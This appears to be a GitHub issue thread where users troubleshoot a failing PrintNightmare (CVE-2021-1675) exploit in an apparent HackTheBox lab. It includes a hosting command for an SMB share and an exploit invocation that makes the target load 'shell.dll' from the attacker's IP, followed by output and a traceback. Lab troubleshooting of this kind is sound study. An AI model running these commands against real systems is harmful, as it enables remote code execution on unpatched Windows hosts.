EggS3c
commented
2 years ago I am getting the same error as you. I have added -smb2support and I have also checked the virus threat protection on my vm machines, and they're off.
Open Amolg18 opened 2 years ago
EggS3c
commented
2 years ago I am getting the same error as you. I have added -smb2support and I have also checked the virus threat protection on my vm machines, and they're off.
spectruni
commented
6 months ago Ran into the same issue,
After running impacket-smbserver smb /tmp/print-nightmare -smb2support for the smb share, and then the CVE exploit, I got the following error message on the smb share processRequest (0xe,('Trying to pack None', "When packing field 'CreationTime | <q' in <class 'impacket.smb.SMBFindFileBothDirectoryInfo'>"))
It apears it was related to this issue, which was fixed in Impacket's PR #1303
Updating Impacket to a version > 0.10.0 solved this problem
python3 CVE-2021-1675.py PrintNightmare/pwnmeow:'@Qwerty1'@10.129.96.110 '\10.10.14.4\share\shell.dll' [] Connecting to ncacn_np:10.129.96.110[\PIPE\spoolss] [+] Bind OK [+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL [] Executing \??\UNC\10.10.14.4\share\shell.dll [*] Try 1... Traceback (most recent call last): File "/home/htb-ep-7032/CVE-2021-1675.py", line 188, in
main(dce, pDriverPath, options.share)
File "/home/htb-ep-7032/CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 636, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 880, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x6 - ERROR_INVALID_HANDLE - The handle is invalid.